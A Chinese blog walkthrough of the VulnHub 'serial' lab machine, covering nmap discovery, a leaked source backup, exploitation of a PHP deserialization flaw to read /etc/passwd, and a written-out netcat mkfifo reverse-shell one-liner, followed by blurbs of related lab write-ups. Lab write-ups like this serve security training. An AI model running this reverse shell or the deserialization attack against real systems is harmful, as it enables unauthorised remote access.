反序列化靶机serial复现

最新推荐文章于 2024-08-19 08:56:50 发布
最新推荐文章于 2024-08-19 08:56:50 发布
阅读量775 收藏 6
点赞数 17
分类专栏: 靶机渗透详解~ 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/muyuchen110/article/details/140857326
版权

靶机描述

                  今天研究一下php反序列化,靶机serial实战。目标为获取root权限。

-------------------------------------

靶机信息

                  可以去vulhub上下载此靶机:serial: 1 ~ VulnHub下载好,之后,使用Vmware新建虚拟机打开:

 

渗透测试过程:

             探测主机存活(目标主机IP地址)

             使用nmap探测主机存活或者使用Kali里的netdicover进行探测。

             扫描到存活主机, 开放了22和80端口

        访问web服务

 F12查看,是一串base64编码

 解码,是一串代码

 尝试逻辑绕过,将sk4换成admin,看看是否有什么信息。

 这里直接报500错误,没办法,只有找其他思路。

 

目录扫描

  • 1.使用工具进行扫描,这里扫到一个/backup/目录。

 打开查看,是一个zip文件,下载查看,是三个源代码文件

 发现三个php文件,打开看是

网站源码

代码审计

user.class.php

通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。

 经过代码审计可构造payload,尝试读取passwd文件,payload如下:

 

成功包含,看到有一个sk4用户可以登录

get shell

构造序列化语句上传shell

 然后再次抓包 打开用burp的repeater

 

成功执行

上传后反弹shell

本地监听端口

 

开始反弹shell

rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>&1|nc+192.168.77.129+5555+>/tmp/f

将上述代码url编码后填入参数位置

 监听成功

 在攻击模块发送获取shell 查找一个txt.bak文件

 查看文件得到密码

 最后在远程连接 成功进入

Myc.localhost
关注
专栏目录
Fastjson反序列化RCE漏洞复现—CNVD-2017-02833
afei001
10-10 883
fastjson是一款用Java语言编写的高性能功能完善的JSON库。可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定se
Fastjson反序列化RCE漏洞复现—CNVD‐2019‐22238
afei001
10-09 903
fastjson是一款用Java语言编写的高性能功能完善的JSON库。可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据, 使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。
decoy靶机复现
最新发布
weixin_52956666的博客
08-19 770
使用root用户,运行0.49版本的chkrootkit程序,也就是通过使用命令/usr/bin/touch /dev/shm/STTY5246,或者使用程序honeypot.decoy的功能5 Launch an AV Scan.,或者甚至什么也不做,来调用root用户运行0.49版本的chkrootkit程序。pspy是Linux系统的进程监控工具,可以记录进程的运行情况,包括启动进程的命令,一定程度上类似于详细版的history命令。当用户为root用户,运行0.49版本的chkrootkit程序。
liceo靶机复现
m0_72372037的博客
04-30 524
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Liceo本机环境:NAT模式下,使用VirtualBox。
WebDeveloper靶机复现
weixin_52956666的博客
08-12 374
cd /var/www/html/ ,查看 wp-config.php 文件。在wireshark里面查看,发现wordpress的账户密码。密码:Te5eQg&4sBS!靶机ip为192.168.112.137。sudo -l查看发现没有免密操作。账号:webdeveloper。账号:webdeveloper。使用kali反弹shell。改成kali的ip进行监听。sudo -l查看免密操作。发现可以文件上传的地方。发现了数据库的账号密码。getshell成功。
php的反序列化漏洞扫描,浅析php反序列化漏洞
weixin_39631667的博客
03-28 295
反序列化在很多语言中都比较常见,下面简单介绍php的反序列化漏洞(对象注入)。0x00.是什么——whatphp反序列化漏洞,又叫对象注入。涉及到的是php中的两个函数:unsearialize()与serialize()。后者为将一个对象或者数组转换为字符串以便保存,前者则将尝试将字符串恢复为对象或者数组。关于这个漏洞大家平时可能很少见,它的触发点主要是在代码审计中cms的session序列化与...
Tomato靶机复现过程
weixin_67729650的博客
08-04 1160
这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识,去试试。
Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告
weixin_48400575的博客
01-25 3249
演示视频 Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/ 参考文章 https://vulhub.org/#/environments/apereo-cas/4.1-rce/ Apereo-cas 4.1 反序列化 RCE 漏洞_菜鸟的学习笔记-CSDN博客Apereo-cas 4.1 反序列化 RCE 漏洞一. 环境搭建使用vul
Jmeter RMI 反序列化命令执行漏洞复现
Tauil的博客
08-02 893
针对目标主机地址及端口的RMI Registry建立远程连接(RMI—使用Java远程消息交换协议JRMP(Java Remote Messaging Protocol)进行通信),连接成功后提交执行用户选择的 payload。可以看到,环境开启后将启动RMI服务并监听1099端口,我们只需要使用ysoserial.exploit.RMIRegistryExploit即可执行任意命令。靶场:vulhub—jmeter/CVE-2018-1297/根据输入命令转化为对应序列化内容,然后将消息发送。...
【代码扫描修复】不安全的反序列化攻击(高危)_java反序列化漏洞修复
2401_84302369的博客
05-02 1157
将内存对象转化为可以存储以及传输的二进制字节、xml、json、yaml 等格式。将虚化列存储的二进制字节、xml、json、yaml 等格式的信息重新还原转化为对象实例。数据格式序列化后的信息样例二进制在这里插入图片描述xmljsonyaml!/\*\*\* 白名单校验\*/super(in);@Override// 白名单校验if (!使用示例:Test.java/\*\*\* 序列化\*/try {/\*\*\* 反序列化
Vulnhub-DC-2 靶机复现完整过程
Continuejww的博客
12-13 1203
::文章参考:https://blog.csdn.net/a310034188/article/details/121624538。
[hackme]靶机复现漏洞详解!!
muyuchen110的博客
07-29 372
首先虚拟机建一个hackme靶机切换nat模式 然后kali扫描自己全端口nmap -sV ip段 0/24扫描出ip进行访问发现是个登录页面可以注册先注册然后登录发现是搜索框,我们直接用搜索型的sql注入。
Web漏洞扫描工具(批量脱壳、反序列化、CMS)
antaidi1217的博客
01-01 1124
一、什么是Web漏洞扫描工具 即是指“扫描Web应用以查找安全漏洞(如跨站脚本,SQL注入,命令执行,目录遍历和不安全服务器配置)的自动化工具”,其中许多可能是由不安全或不正确的编码和设计。另一方面,通用(网络或系统)扫描器可以识别开放端口,主动IP地址和登录,主机操作系统和软件类型,修订版本和修补程序级别以及运行的服务。 二、漏洞扫描主要策略 1.主机漏洞扫描:通常在目标系统上安...
【JAVA反序列扫描工具】简介、下载、安装、使用
04-22 5244
【反序列扫描工具】
反序列化靶机serial漏洞复现 超详细教程
qq_48368964的博客
08-01 825
漏洞环境:https://www.vulnhub.com/entry/serial-1,349/ 下载后使用Vmware打开创建新的虚拟机: 选择客户机版本为Ubuntu 64位: 一直下一步,知道选择使用现有磁盘: 选择下载的vmdk磁盘文件: 开机,环境配置完成: 访问下web 抓一下包发到重放器中看看 发现 cook 是被加密的解码网址:Base64 在线编码解码 | Base64 加密解密 - Base64.us下载下来三个文件 index.php: user.class.php:
vulnhub serial讲解
m0_64815693的博客
12-14 1811
PHP反序列化靶机
weblogic漏洞扫描工具 反序列化漏洞扫描工具
Innocence_0的博客
03-16 1339
weblogic漏洞扫描工具 反序列化漏洞扫描工具
CMS靶机源码深入剖析
这些工具可能包括漏洞扫描器、网络嗅探工具、自动化渗透测试框架等。掌握这些工具的使用对于提高测试效率和安全性评估的质量至关重要。 8. 教育与学习资源:对于网络安全爱好者来说,靶机提供了一个学习和实践的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值